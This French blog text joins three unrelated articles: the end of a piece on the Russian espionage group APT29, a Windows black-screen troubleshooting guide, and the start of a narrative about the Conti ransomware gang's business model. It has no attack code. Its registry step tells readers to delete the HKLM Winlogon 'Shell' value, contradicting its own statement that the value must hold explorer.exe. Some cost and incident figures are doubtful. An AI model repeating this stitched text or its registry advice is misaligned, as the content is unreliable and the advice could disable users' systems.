En 2023-2024, on voit également apparaître de nouveaux outils comme WINELOADER et SNOWYAMBER. WINELOADER utilise des leurres sur le thème du vin (d’où le nom) pour cibler les diplomates. SNOWYAMBER intègre des routines anti-détection super avancées et peut désactiver les solutions de sécurité avant de s’exécuter. Ces mecs ne s’arrêtent jamais d’innover !
Les techniques de persistence d’APT29 sont aussi impressionnantes. Ils utilisent le DLL Side-Loading, créent des tâches planifiées Windows légitimes, modifient les clés de registre de démarrage, et exploitent même les mécanismes de signature de code de Windows. Bref, une fois qu’ils sont dans votre système, c’est comme essayer d’enlever de la super glue sur vos doigts… bon courage !
Les cibles d’APT29 révèlent leurs priorités stratégiques. Gouvernements occidentaux, particulièrement les ministères des affaires étrangères et de la défense. Cercles de réflexion qui influencent les politiques. Entreprises technologiques qui développent des innovations critiques. Organisations internationales comme l’ONU, l’OTAN ou l’UE. Bref, tout ce qui peut donner à la Russie un avantage stratégique est dans leur viseur.
Mais APT29 ne s’intéresse pas qu’à l’Occident. Ils espionnent aussi les pays de l’ex-URSS, les gouvernements asiatiques, africains et du Moyen-Orient. Ils surveillent même les groupes d’opposition russes et les oligarques qui pourraient poser problème. Le SVR veut tout savoir, tout contrôler. C’est Big Brother version cyber !
L’ONU, une des nombreuses organisations internationales ciblées
Comme je vous le disais, la patience d’APT29 est vraiment légendaire car dans certains cas documentés, ils sont restés dans des réseaux pendant plus de cinq ans sans être détectés. Cinq ans ! Ils observent, ils apprennent les habitudes, ils comprennent l’organisation et quand ils frappent enfin, ils savent exactement où chercher et quoi prendre.
Cette approche “low and slow” (basse et lente) est typique du SVR. Contrairement au GRU qui fait dans le spectaculaire et le perturbateur (coucou NotPetya !), le SVR privilégie le renseignement à long terme car ils veulent comprendre les intentions, anticiper les décisions, influencer subtilement plutôt que détruire brutalement.
C’est pourquoi les experts en cybersécurité ont un respect mêlé de crainte pour APT29. John Hultquist de Mandiant les décrit comme “les meilleurs dans le domaine”. Dmitri Alperovitch de CrowdStrike dit qu’ils sont “extrêmement disciplinés et professionnels”. Ce ne sont pas des script kiddies ou des hacktivistes. Ce sont des professionnels du renseignement avec des moyens illimités et 20 ans d’expérience.
Notez quand même que le coût humain et financier des opérations d’APT29 est astronomique. Les dommages directs se chiffrent en milliards, notamment avec le coût de la remédiation après SolarWinds qui dépasse les 100 milliards de dollars selon certaines estimations. Mais le vrai coût, c’est la perte de confiance, les secrets volés, l’avantage stratégique donné à la Russie. Et comment chiffrer ça ?
Et le pire dans tout ça, c’est qu’on ne sait probablement pas tout car APT29 est si doué pour rester invisible qu’il y a certainement des intrusions non découvertes. Combien de réseaux sont encore compromis ? Quels secrets ont été volés sans que personne ne s’en aperçoive ? C’est ça le vrai cauchemar qui empêche les RSSI du monde entier de dormir.
Mais l’attribution d’APT29 au SVR est maintenant officielle. En avril 2021, les États-Unis, le Royaume-Uni, l’Australie, le Canada, la Nouvelle-Zélande, l’OTAN et l’UE l’ont même confirmé publiquement, mais bon, ça change quoi concrètement ? Les membres d’APT29 ne seront jamais extradés, jamais jugés et ils continueront leur travail, protégés par l’État russe.
Le SVR a surtout une longue histoire d’espionnage derrière lui… C’est l’héritier de la Première Direction principale du KGB, responsable du renseignement extérieur. Des légendes comme Kim Philby, Guy Burgess et Donald Maclean (les fameux espions de Cambridge) travaillaient pour les prédécesseurs du SVR. APT29 est donc la continuation de cette tradition avec des moyens modernes. Les méthodes changent mais les objectifs restent les mêmes.
Ce qui est dingue, je trouve, c’est la normalisation de ces attaques car il y a 20 ans, pirater la Maison Blanche aurait été considéré comme un acte de guerre. Aujourd’hui, c’est juste un mardi comme les autres. Les pays occidentaux dénoncent, imposent des sanctions, expulsent des diplomates, mais les attaques continuent. C’est une nouvelle normalité de la guerre froide numérique.
Cependant, les leçons à tirer de l’affaire APT29 sont multiples et cruciales. D’abord, la cybersécurité n’est jamais acquise. Même les organisations les plus sophistiquées peuvent être compromises. Ensuite, la supply chain est le maillon faible. SolarWinds l’a montré de manière spectaculaire : compromettre un fournisseur, c’est potentiellement compromettre des milliers de clients.
L’importance du renseignement humain reste également évidente car sans les Néerlandais et leurs caméras, on n’aurait jamais eu cette vision unique des opérations d’APT29. Sans oublier la coopération internationale qui est absolument cruciale dans ce genre de cas. Les Néerlandais ont aidé les Américains, qui ont aidé les Britanniques, qui ont aidé tout le monde… Face à des adversaires étatiques avec des ressources illimitées, les démocraties doivent s’entraider, mais cette coopération est fragile, comme l’a montré la fin prématurée de l’accès néerlandais.
Et pour les entreprises et les organisations, le message est clair : Vous êtes peut-être déjà compromis car APT29 est patient, très patient… et ils peuvent déjà être dans vos systèmes depuis des années. Une approche “assume breach” (supposez que vous êtes compromis) est donc plus réaliste qu’une approche “empêcher toute intrusion”.
L’authentification multi-facteurs, le principe du moindre privilège, la segmentation réseau, la surveillance comportementale, les EDR/XDR… Toutes ces mesures sont essentielles, mais même avec tout ça, APT29 peut trouver un moyen d’accéder à vos systèmes.
Sans oublier que APT29 continue inexorablement de s’adapter, d’apprendre de leurs erreurs, et d’intégrer de nouvelles techniques à leurs process. L’intelligence artificielle, le machine learning, l’informatique quantique… Toutes ces technologies seront probablement dans leur arsenal dans les années à venir et ce futur s’annonce aussi passionnant que terrifiant ^^.
Certains experts prédisent que la prochaine grande vague d’attaques d’APT29 visera massivement l’infrastructure cloud car avec de plus en plus d’organisations qui migrent sur AWS, Azure ou Google Cloud, c’est la cible logique. Imaginez APT29 avec un accès root aux infrastructures cloud de milliers d’entreprises. Le potentiel de chaos serait vertigineux !
D’autres s’inquiètent également des deepfakes et de la désinformation assistée par IA. APT29 a les compétences techniques et les ressources pour créer des deepfakes ultra-convaincants alors imaginez de fausses vidéos de leaders mondiaux déclarant la guerre, de PDG annonçant des faillites, ou de responsables politiques dans des situations compromettantes. Encore un potentiel énorme de chaos.
Et surtout, comment répondre efficacement à APT29 ??? Car les sanctions économiques et les dénonciations publiques n’ont visiblement aucun effet sur eux. Certains proposent des cyber-ripostes offensives, mais ce serait l’escalade assurée avec un adversaire qui a l’arme nucléaire. D’autres voudraient aussi négocier des “règles du jeu” dans le cyberespace, mais la Russie n’est clairement pas intéressée.
Quoiqu’il en soit, APT29 est à la fois un problème de sécurité nationale et un problème de sécurité individuelle car leurs opérations affectent la géopolitique mondiale, les élections, les relations internationales, mais aussi la vie privée de millions de personnes lambda. Les emails dans le hack du DNC, les données médicales dans le hack de SolarWinds, vos infos perso dans celui de Microsoft… Nous sommes tous des victimes collatérales potentielles.
Surtout que l’histoire d’APT29 est loin d’être finie car tant que le SVR existera et tant que la Russie verra l’Occident comme un adversaire existentiel, les opérations continueront…
Bref, dormez tranquilles braves gens, APT29 veille sur vos données ! 😅
L’écran noir au démarrage est l’un des problèmes les plus frustrants sous Windows 11 ou Windows 10. Votre PC semble s’allumer, mais rien ne s’affiche ? Vous êtes bloqué sur un écran noir sans message, ou avec une mention comme “No Input” ou “Cable Not Connected” ? Ou encore, Windows démarre, mais au lieu d’afficher le bureau, vous vous retrouvez face à un écran noir, parfois avec seulement le curseur visible ?
Ce type de dysfonctionnement peut avoir plusieurs causes : un souci matériel (câble mal branché, carte graphique défectueuse, RAM défaillante), un problème logiciel (pilote graphique corrompu, bug dans le système), voire un conflit avec une mise à jour de Windows.
Ce guide complet vous aide à diagnostiquer et corriger tous les cas possibles d’écran noir sur Windows 11 ou 10. Il est structuré en deux grandes parties :
L’écran noir dès le démarrage du PC : aucun logo, aucun son de démarrage, écran totalement noir ou message “No Input” / “Cable Not Connected”. Cela indique généralement un problème matériel ou d’affichage avant le chargement de Windows.
L’écran noir au démarrage de Windows : le PC s’allume, vous voyez peut-être le logo Windows ou le BIOS, mais au moment de charger le bureau, plus rien. Cela relève le plus souvent d’un problème logiciel ou de pilote graphique.
Suivez les étapes dans l’ordre pour identifier la cause exacte et appliquer la solution la plus adaptée à votre situation.
Écran noir avant le démarrage de Windows (problèmes matériels)
Les sources probables d’un écran noir au démarrage du PC :
L’écran ne fonctionne plus et ne détecte plus la carte vidéo
Le câble PC / Écran est abîmé
La carte graphique est endommagée. Cela peut simplement venir de la sortie vidéo ou la carte graphique est totalement morte
Vous venez de changer de carte graphique pour une plus puissante et votre bloc d’alimentation est sous-dimensionnée
La carte mère ou le PC en général comporte un problème matériel suite à une surtension, choc, etc.
Nouveau matériel installé (carte graphique, RAM, etc.)
L’installation récente d’un composant peut provoquer un écran noir si celui-ci est mal connecté, incompatible, ou trop gourmand en énergie.
Carte graphique : assurez-vous qu’elle est correctement enfichée dans le port PCIe et que les connecteurs d’alimentation sont bien branchés. Les cartes graphiques modernes (RTX, Radeon RX) requièrent souvent une alimentation de 550 W à 750 W au minimum. Un bloc insuffisant ou vieillissant peut empêcher le système de démarrer.
RAM : une barrette mal insérée ou défectueuse peut bloquer le démarrage. Essayez de retirer les barrettes, de les tester une à une ou de revenir à l’ancienne configuration si le problème est apparu juste après l’ajout.
Autres composants : un SSD mal branché, un boîtier USB défectueux, ou un périphérique conflictuel peuvent aussi provoquer un blocage avant le POST (Power On Self Test).
Voici les points importants à prendre en compte :
Vérifier la compatibilité du matériel : lorsque vous installez un nouveau composant (carte graphique, RAM, SSD, etc.), il est essentiel de s’assurer qu’il est pleinement compatible avec votre configuration actuelle. Un matériel incompatible peut entraîner un écran noir dès l’allumage du PC ou provoquer des plantages pendant le POST.
S’assurer que l’alimentation est suffisante : une alimentation insuffisante est une cause fréquente d’écran noir au démarrage, notamment après l’installation d’une nouvelle carte graphique ou d’un processeur plus performant. Si votre alimentation ne fournit pas assez de puissance, le PC peut rester bloqué sans affichage, redémarrer en boucle ou ne pas passer le POST.
Bien réinsérer les composants (RAM, GPU, câbles d’alimentation PCIe) : une mauvaise connexion physique est l’une des causes les plus simples, mais aussi les plus fréquentes d’écran noir. Lors d’un montage ou d’une mise à jour matériels, il suffit d’un composant mal enfoncé ou d’un câble mal branché pour empêcher le démarrage du PC ou bloquer l’affichage.
En cas de doute, revenez à la configuration matérielle d’origine et testez étape par étape.
Vérifier l’alimentation (secteur, batterie, hard reset)
Vous avez probablement déjà vérifié, mais encore une fois, vérifiez l’alimentation de votre écran et ordinateur. Sur l’écran, un voyant ou LED bleu doit s’allumer pour indiquer que ce dernier est bien sous tension.
Si tous les voyants semblent corrects, mais que rien ne s’affiche, il se peut que l’ordinateur soit en veille et que ce dernier ne se réveille pas. Dans le cas, tentez un hard/Power reset comme expliqué dans le lien suivant :
Enfin, si vous avez plusieurs écrans, n’hésitez pas à tester votre ordinateur dessus.
Vérifier les câbles et sorties vidéo
Une autre vérification simple est de s’assurer que les câbles entre l’ordinateur et l’écran soient bien branchés. Vous pouvez avoir deux cartes vidéos, une carte vidéo intégrée à la carte mère et une carte graphique dédiée. Windows est censé désactiver la carte vidéo intégrée à la carte mère, mais parfois cela n’est pas le cas. N’hésitez pas à tester votre écran sur les deux cartes vidéos ou avec un autre câble notamment entre a sortie VGA, DVI et HDMI.
Vérifiez aussi la sortie du moniteur, certains ont des sorties VGA, HDMI, DVI. Si vous avez la possibilité de toutes les tester, n’hésitez pas. Des boutons sous l’écran permettent de passer d’une sortie à l’autre qui s’affichent alors sur l’écran. Vérifiez bien que vous êtes sur la bonne sortie écran.
Pour les PC portables, la nappe écran s’endommage souvent surtout après un choc ou une chute. Cependant, dans ces cas-là, il faudra la remplacer.
Tester les composants internes (GPU, RAM…)
La dernière chose à vérifier est le matériel de l’ordinateur.
Dans un premier temps, débranchez tous les périphériques (clavier, souris, imprimantes, scanner, etc). En effet, parfois un problème sur un autre périphérique peut provoquer un écran noir.
N’hésitez pas à ouvrir l’unité centrale pour vérifier l’alimentation de la carte mère
Testez le démarrage avec les composants hardware minimum. Le but ici est de supprimer autant de matériel que possible tout en conservant la capacité de votre PC à s’allumer. À savoir :
Processeur
Carte graphique
Une barrette de mémoire
Pour les utilisateurs à l’aise avec le matériel, vérifiez que le ventilateur de la carte vidéo tourne et que les barrettes de mémoire sont bien connectées à la carte mère. Tentez aussi de démarrer l’ordinateur en débranchant le disque dur.
La carte graphique est souvent le composant matériel source d’écran noir à l’allumage du PC. En effet, la carte vidéo est en charge de l’affichage, si celle-ci est endommagée alors, vous n’aurez aucune image à l’écran. Le problème peut se situer sur la sortie, il arrive, par exemple, que la sortie VGA ne fonctionne plus, mais le HDMI oui. Si vous avez la possibilité de tester avec une seconde carte graphique, faites le test.
Tester ou remplacer le bloc d’alimentation
Testez votre alimentation avec un multimètre ou un Power Supply Tester. Ce n’est pas parce que les ventilateurs et les lumières de votre ordinateur fonctionnent que le bloc d’alimentation fonctionne correctement. Le bloc d’alimentation a tendance à causer plus de problèmes que tout autre matériel et est souvent la cause du fonctionnement sélectif ou intermittent des composants d’un ordinateur.
Remplacez votre bloc d’alimentation immédiatement s’il échoue à l’un des tests que vous effectuez.
Vérifier la carte mère ou le BIOS
Des problèmes sur la carte mère peuvent provoquer des démarrages impossibles, des périphériques non détectés, ou des plantages aléatoires. Voici les opérations de vérification qui peuvent être réalisées :
Vérifiez les condensateurs : Des condensateurs gonflés ou endommagés peuvent indiquer que la carte mère est défectueuse.
Retirez et réinsérez les composants (RAM, carte graphique, etc.) pour vous assurer qu’ils sont bien connectés.
Vous pouvez aussi utiliser un testeur de carte mère. C’est un appareil utilisé pour diagnostiquer les problèmes matériels d’une carte mère d’ordinateur. Il permet de vérifier si la carte mère fonctionne correctement ou s’il y a des défaillances, comme des composants défectueux, des circuits endommagés ou des problèmes de connexion.
Si votre ordinateur ne montre pas les signes de vie ci-dessus, il y a probablement un problème avec votre ordinateur, pas votre moniteur. Les problèmes d’ordinateur portable sont difficiles à diagnostiquer. Vous devrez donc probablement envoyer votre ordinateur en réparation.
Les problèmes de bureau peuvent être diagnostiqués à l’aide d’un vérificateur de code POST (Power-On Self-Test) que vous pouvez acheter. Toutefois, son utilisation requiert quelques connaissances.
Écran noir au démarrage de Windows (causes logicielles)
Sélectionner la bonne sortie vidéo
Un écran noir total, l’écran indique ne plus recevoir de flux et un message No Input ou Cable Not Connected, plusieurs choses sont à tenter. Si plusieurs cartes graphiques sont présentes, tentez de passer sur la carte vidéo intégrée à la carte mère, comme expliqué dans le paragraphe précédent.
Une mauvaise résolution non supportée par l’écran peut provoquer un écran noir, dans ce cas, deux solutions sont possibles :
brancher l’ordinateur à un écran plus récent qui supporte la résolution écran
Une autre source peut être une mauvaise configuration de la sortie écran de Windows, après l’utilisation de deux écrans ou d’un rétroprojecteur. Sur les portables, il existe des touches raccourcies pour changer la sortie écran. En général, il s’agit de la combinaison de touches FN +
F7.
Forcer le chargement du bureau avec le gestionnaire de tâches
Sur l’écran noir, vous devez vérifier si le gestionnaire de tâches est accessible. Ce dernier peut vous permettre de démarrer de nouvelles applications, donnant ainsi partiellement la main sur l’ordinateur.
Appuyez sur les touches CTRL+ALT+Suppr, si un menu s’ouvre choisissez gestionnaire de tâches.
Depuis l’onglet processus, si vous voyez un processus runonce ou runonce32, tuez le avec le bouton fin de tâches.
Cela peut permettre au bureau de Windows de se charger.
Sinon vous pouvez tenter de lancer de nouvelles commandes. Depuis le menu Fichier se trouve l’option Exécuter une nouvelle tâche qui vous permet de lancer des commandes.
Tentez de lancer successivement les commandes suivantes pour vérifier si le bureau s’ouvre : userinit.exe, winlogon.exe ou explorer.exe
Parfois, c’est plus complexe, car un logiciel malveillant a modifié des clés du registre Windows. Une mauvaise configuration peut alors empêcher le démarrage de Windows, les clés à surveiller :
la clef Userinit
la clef Shell qui doit contenu le shell Windows à savoir explorer.exe
Vérifiez les clés suivantes à l’aide de l’éditeur du registre de Windows. explorer.exe doit être présents dans les deux clés Shell suivantes :
Saisissez regedit dans la fenêtre exécuter et cliquez sur OK
Déroulez à gauche en cliquant sur les + : HKEY_CURRENT_USER > SOFTWARE > Microsoft > Windows NT > CurrentVersion > Winlogon
A droite, si une clé « Shell » est présente, supprimez la
Enfin recommencez avec l’arborescence suivante HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, à nouveau si une clé Shell est présente supprimez la.
Redémarrez l’ordinateur, vous pouvez utiliser la commande shutdown /r (y a un espace) pour redémarrer, au besoin.
Voici un exemple de problème d’ouverture de session Windows en vidéo. Vous pouvez tenter de lancer l’explorer.exe à la main.
Effectuer un Power Reset (réinitialisation alimentation)
Pour résoudre les écrans noirs, vous pouvez aussi tenter une réinitialisation électrique ou Power Reset. Cela consiste en une coupure électrique pendant 10 minutes. Cela retire toute alimentation de la carte mère et peut remettre l’ordinateur en marche si ce dernier a un comportement anormal.
Une réinitialisation de l’alimentation ou un redémarrage matériel ou encore en anglais Power Reset ou Hard Reset efface toutes les informations de la mémoire de l’ordinateur sans effacer les données personnelles. Cela peut résoudre des corruptions de sources d’alimentation qui engendre des comportements aléatoires de votre PC. Voici la procédure générique à réaliser.
Pour les PC portables :
Éteignez votre ordinateur
Débranchez le cordon d’alimentation, s’il s’agit d’un portable, retirez la batterie (voir notice si nécessaire).
En ayant le cordon d’alimentation débranché ou la batterie retirée, appuyez sur la touche d’alimentation pendant quelques secondes, comme si vous vouliez allumer ce dernier. Cela va vider toute l’électricité contenue dans l’ordinateur.
Re-branchez le tout ou remettez la batterie du portable.
Pour un PC de bureau :
Mettez l’alimentation sur « OFF » (Bouton On/off de l’alimentation) et retirez le cordon d’alimentation
Maintenez le bouton d’alimentation qui sert à allumer l’ordinateur, et qui se trouve en façade du boîtier. Enfoncez pendant 20 secondes environ afin de vider les condensateurs
Remettez le câble d’alimentation puis mettez l’alimentation sur « ON »
Appuyez sur le bouton d’alimentation pour allumer l’ordinateur normalement
Plus de détails avec tous les conseils et autres méthodes sur cette page :
Depuis les options de récupération de Windows, cliquez sur Dépannage.
puis Options avancées afin d’ouvrir ces dernières.
Dans les options avancées de récupération, cliquez sur le bouton Paramètres à droite.
Et enfin redémarrer l’ordinateur afin de redémarrer sur les paramètres de démarrage.
À partir de là, un menu avec des choix va s’ouvrir au démarrage de l’ordinateur.
Sélectionnez 5 pour redémarrer en mode sans échec avec la prise en charge du réseau.
Si le problème d’écran noir ne se pose pas en mode sans échec, vous pouvez alors tenter de le résoudre. Voici ce que vous pouvez tester afin de résoudre les problèmes d’écran noir :
Relancez le PC en mode normal et vérifiez si les écrans noirs persistent.
Désinstaller les pilotes de la carte graphique
Si Windows démarre correctement depuis le mode sans échec, vous pouvez tenter de désinstaller les pilotes de la carte graphique. Pour cela, faites un clic droit sur le menu Démarrer puis gestionnaire de périphériques.
Dans le gestionnaire de périphériques se trouve en liste tous les périphériques de l’ordinateur installés dans Windows. Déroulez carte graphique puis sur votre carte graphique, faites un clic droit puis désinstaller l’appareil. Acceptez la désinstallation puis redémarrez Windows en mode normal.
Si Windows démarre correctement et que les problèmes d’écran noir sont résolus. Vous pouvez effectuer une installation propre des pilotes de la carte graphique, pour cela, reportez-vous à l’article : Comment réinstaller proprement les pilotes de la carte graphique.
Désactiver le démarrage rapide
Une autre solution consiste à désactiver le démarrage rapide de Windows . Ce dernier peut poser des problèmes, surtout en retour de mise en veille. Pour ce faire, reportez-vous au premier paragraphe de la page suivante :
Dans le cas d’un problème de synchronisation de votre compte Microsoft avec les serveurs Microsoft, vous pouvez tenter de créer un nouvel utilisateur local. Le but étant de s’identifier dessus en mode normal afin de vérifier si l’écran noir y est aussi présent. Pour créer un nouvel compte local administrateur, reportez-vous à notre article :
Pour créer un utilisateur test, saisissez la commande suivante : net user test /add
Afin de passer l’utilisateur test en administrateur en ajoutant ce dernier dans le groupe administrateur, vous devez passer la commande suivante : net localgroup administrateurs test /add
Déroulez la carte graphique et double-cliquez dessus l’onglet pilote
Cliquez sur Version précédente afin de revenir à la version précédente des pilotes de votre carte graphique.
Testez si cela aide à résoudre les problèmes d’écran noir sur Windows.
Utiliser LazeSoft Recovery Suite
LazeSoft Recovery Suite est un ensemble d’outil de récupération, correction et réparation de Windows. Avec ce dernier on peut restaurer le registre Windows.
Si Windows ne fonctionne plus correctement malgré les diagnostics, le nettoyage, ou la réparation via des outils système, la réinitialisation ou la réinstallation peut s’avérer nécessaire. Ces opérations permettent de repartir sur une base saine, en supprimant les problèmes causés par des fichiers corrompus, des pilotes défectueux ou des modifications système hasardeuses.
La réinitialisation de Windows permet de restaurer le système à son état d’origine tout en gardant (ou non) ses fichiers personnels. C’est souvent la solution à privilégier en premier, car elle est rapide, automatisée, et accessible depuis les paramètres ou les options de démarrage avancées.
Toutes ces options sont aussi accessibles depuis les options de récupération système. Réinitialiser ce PC est accessible avant les options avancées.
La restauration du système, elle, est disponible depuis les options avancées de récupération système de Windows.
La réinstallation propre de Windows, quant à elle, consiste à effacer complètement le disque système et à réinstaller Windows à partir d’un support d’installation (clé USB, ISO). Elle est plus radicale mais utile en cas de corruption grave ou de doute sur la stabilité du système après réinitialisation.
Installez vous confortablement car cet article va être un peu long… Normal, il raconte l’histoire complètement dingue d’un gang de cybercriminels qui a littéralement fait muter un simple ransomware en startup façon Silicon Valley.
Conti, c’est l’histoire d’une organisation criminelle russe qui a généré 180 millions de dollars rien qu’en 2021, qui payait ses hackers avec des fiches de paie et des programmes “employé du mois” (si si, je vous jure), et qui s’est complètement vautrée après avoir choisi le mauvais camp dans la guerre contre l’Ukraine.
Bref, du jamais vu dans l’histoire du cybercrime !
L’écran de la mort version 2020 ou quand vos fichiers deviennent otages
Tout commence donc fin 2019, quelque part dans les bas-fonds numériques de Saint-Pétersbourg où un groupe de cybercriminels russes, déjà bien connus sous le nom de Wizard Spider (oui, “l’araignée magicienne”, ils ont pas cherché loin), décide qu’il est temps de passer à la vitesse supérieure.
Et ce ne sont pas des débutants, non, non, car depuis 2016, ils sont déjà derrière Ryuk, un ransomware qui a déjà rapporté la bagatelle de 150 millions de dollars et surtout TrickBot, l’un des botnets les plus vicieux au monde avec plus d’un million de machines infectées. Ce malware bancaire ultra-sophistiqué s’infiltre via des campagnes de phishing massives, vole vos identifiants bancaires, cartographie l’intégralité de votre infrastructure réseau, identifie les machines critiques, et prépare le terrain pour le déploiement du ransomware.
Mais avec Conti, ils veulent carrément industrialiser le crime.
Saint-Pétersbourg : ville des tsars, de Dostoïevski… et des cybercriminels millionnaires
Alors fin 2019, ils ont une super idée pour des criminels : Pourquoi se contenter d’attaques ponctuelles quand on peut créer le McDonald’s du ransomware avec des franchises ? C’est là que naît Conti et le principe est simple : transformer le ransomware en service (RaaS - Ransomware as a Service) comme ça au lieu de tout faire eux-mêmes comme des artisans à l’ancienne, ils vont recruter une armée d’affiliés qui feront le sale boulot de terrain, et tout le monde se partagera les bénéfices. C’est l’uberisation du crime, version russe.
Sauf que Conti va beaucoup plus loin que tous les autres gangs de ransomware car là où la plupart des groupes fonctionnent sur un modèle de commission classique (l’affilié garde 70-80% de la rançon, le reste va aux développeurs), Conti innove complètement puisqu’ils paient leurs affiliés avec un salaire fixe mensuel. Oui, un vrai salaire, avec des fiches de paie, des augmentations annuelles, et même des bonus de performance pour les meilleurs éléments. C’est la première fois dans l’histoire du cybercrime qu’on voit ça.
Et les documents qui ont fuité en 2022 (les fameux Contileaks, j’y reviendrais plus tard…) révèlent ainsi une organisation qui dépasse l’entendement. Des chasseurs de têtes russes parfaitement légitimes sont utilisés pour recruter de nouveaux “employés” sur des sites comme HeadHunter.ru (l’équivalent russe de LinkedIn). Les candidats passent des entretiens d’embauche en bonne et due forme, avec tests techniques et tout le tralala. Ils signent même des contrats (bon, évidemment pas super légaux) et intègrent des équipes ultra-spécialisées. Y’a l’équipe “pentest” qui s’infiltre dans les réseaux, l’équipe “crypto” qui gère les paiements Bitcoin et le blanchiment, l’équipe “négociation” qui discute avec les victimes, l’équipe “dev” qui améliore le ransomware, l’équipe “support” qui aide les affiliés en difficulté…
Ils ont même mis en place un programme “employé du mois” avec photo sur le mur virtuel et tout. Les meilleurs performers reçoivent ainsi des bonus en Bitcoin (entre 5 000 et 50 000 dollars selon les performances), des félicitations publiques sur leur chat interne Jabber, et des opportunités de “promotion”. Un hacker particulièrement doué peut ainsi gravir les échelons, et passer de simple “pentester” junior, à senior, puis à “team lead” avec une équipe de 5-10 personnes sous ses ordres, et enfin à “department head” avec des responsabilités stratégiques. C’est un crossover entre LinkedIn et Le Parrain.
Les salaires révélés dans les fuites donnent le vertige. Un débutant touche environ 1 500 à 2 000 dollars par mois (ce qui est très correct en Russie où le salaire moyen tourne autour de 700 dollars). Un expert confirmé peut monter jusqu’à 10 000 dollars mensuels. Les team leads touchent entre 15 000 et 20 000 dollars. Et les top managers ? On parle de 50 000 dollars par mois et plus. Tout ça payé en Bitcoin évidemment, via des mixers et des échanges décentralisés pour brouiller les pistes. Certains touchent même des “stock options” sous forme de pourcentage sur les futures rançons. Du jamais vu.
Le Bitcoin : la monnaie officielle du crime organisé 2.0
Maintenant, parlons du big boss de cette organisation criminelle 2.0 : Vitaly Nikolaevich Kovalev, 36 ans au moment des faits, connu sous une ribambelle de pseudos tels que “Stern” (son préféré), “Demon”, “Ben”, “Bergen”, “Vitalik K”, ou encore “Alex Konor”. Ce type est littéralement un fantôme numérique car pendant des années, absolument personne ne savait qui se cachait derrière ces pseudos. Même ses plus proches “collaborateurs” ne connaissaient que sa voix sur les chats vocaux chiffrés. Il dirigeait TrickBot et Conti depuis l’ombre, accumulant une fortune estimée par les autorités allemandes à plus de 500 millions de dollars en crypto. Un demi-milliard, vous vous rendez compte ?
Et Kovalev n’est vraiment pas votre hacker cliché en sweat à capuche. C’est un pur businessman du crime, un Steve Jobs du ransomware. Il a compris avant tout le monde que le cybercrime pouvait être organisé exactement comme une entreprise légitime du Fortune 500. Sous sa direction, Wizard Spider est ainski passé d’un petit groupe de hackers russes lambda à une organisation de plus de 150 membres permanents, avec des départements, des process ISO-compliant (j’exagère à peine), des KPIs, des dashboards de performance en temps réel, et même une charte d’entreprise (qui incluait bizarrement un code de conduite éthique, allez comprendre).
Vitaly Nikolaevich Kovalev alias Stern
Alors concrètement, comment fonctionne une attaque type de Conti ? Vous allez voir, c’est du grand art criminel, une chorégraphie millimétrée.
Phase 1 : l’infection initiale. Soit via TrickBot (leur botnet historique), soit via BazarLoader (la version 2.0), soit carrément via des campagnes BazarCall où des call centers indiens appellent les victimes en se faisant passer pour Microsoft. “Bonjour, nous avons détecté un virus sur votre ordinateur, laissez-nous vous aider.” Vous connaissez, c’est classique mais ça marche encore.
Une fois TrickBot installé, le malware fait son boulot de reconnaissance. Il mappe le réseau avec la précision d’un chirurgien : identification des contrôleurs de domaine, des serveurs de sauvegarde, des bases de données critiques, des partages réseau, des comptes à privilèges. Cette phase peut durer des semaines, voire des mois. Les hackers sont patients, méthodiques. Ils utilisent des outils légitimes comme ADFind ou SharpView pour passer sous les radars. Tout est documenté dans des rapports détaillés envoyés à l’équipe d’analyse.
Phase 2 : l’escalade de privilèges et le mouvement latéral. C’est là que Cobalt Strike entre en jeu. Ah, Cobalt Strike… Initialement un outil légitime de pentest à 3 500 dollars la licence, devenu l’arme préférée des cybercriminels. Les versions crackées circulent sur tous les forums underground russes. Conti utilise des configurations custom avec des profils de communication qui imitent le trafic légitime de Google ou Microsoft, leur donnant un contrôle total : exécution de commandes, keylogging, captures d’écran, pivoting, tout y passe.
Et les hackers désactivent méthodiquement toutes les défenses. Windows Defender ? Désactivé via GPO. EDR d’entreprise ? Contourné ou carrément supprimé. Sauvegardes ? Effacées ou chiffrées en premier. Ils utilisent même des techniques d’évasion ultra-sophistiquées : injection de processus, DLL hollowing, obfuscation PowerShell…
Phase 3 : le déploiement du ransomware. Et là, c’est du brutal car Conti est programmé pour chiffrer un maximum de données en un minimum de temps. On parle de 32 threads parallèles qui tournent à plein régime, capable de chiffrer 100 000 fichiers en moins de 10 minutes. Et l’algorithme, c’est du solide : AES-256 pour les fichiers (avec une clé unique par fichier), puis RSA-4096 pour chiffrer les clés AES. Mathématiquement incassable sans la clé privée. Les versions récentes sont passées à ChaCha20 pour gagner encore en vitesse et ainsi, en quelques heures, parfois minutes sur les petits réseaux, tout le système d’information d’une entreprise est foutu.
Mais Conti ne se contente pas de chiffrer vos données. Non non, ce serait trop simple. Avant de lancer le ransomware, ils exfiltrent des téraoctets d’informations sensibles via rclone ou MegaSync. Contrats, données clients, secrets industriels, emails compromettants, tout y passe. Comme ça, si la victime refuse de payer, ils menacent de publier ces données sur leur site “Conti News”, accessible uniquement via Tor. C’est ce qu’on appelle la “double extorsion” : vous payez pour récupérer vos données ET pour éviter qu’elles soient publiées. Certaines victimes ont même subi une “triple extorsion” avec des attaques DDoS en prime si elles traînent trop.
Double extorsion : Si vous ne payez pas, vos données finissent ici (ou pas si elles ont été vendues)
Et les montants des rançons donnent le tournis. En moyenne, Conti demande entre 500 000 et 5 millions de dollars, avec une médiane autour de 800 000 dollars. Mais pour les grosses entreprises ou les gouvernements, ça peut monter beaucoup, beaucoup plus haut. Le Costa Rica s’est par exemple vu réclamer 10 millions initialement, puis 20 millions quand ils ont refusé. Certaines multinationales auraient même payé des rançons à huit chiffres… je vous parle de 20, 30, voire 40 millions de dollars. La plus grosse rançon confirmée est de 34 millions de dollars payés par une compagnie d’assurance américaine (dont le nom n’a jamais fuité).
Le “département négociation” de Conti, c’est aussi du grand art en matière de manipulation psychologique. Des négociateurs sont formés aux techniques de persuasion avancées… Ils alternent menaces voilées et fausse empathie, jouent sur l’urgence ("chaque jour de retard coûte 100 000 dollars supplémentaires"), proposent des “réductions” pour paiement rapide ("payez dans les 48h et on vous fait 40% de remise, offre limitée !"). Certains se font même passer pour des “consultants indépendants en cybersécurité” qui peuvent “aider” la victime à sortir de cette situation délicate. Ils fournissent même des tutoriels détaillés pour acheter des bitcoins, c’est dire le niveau de “service client”.
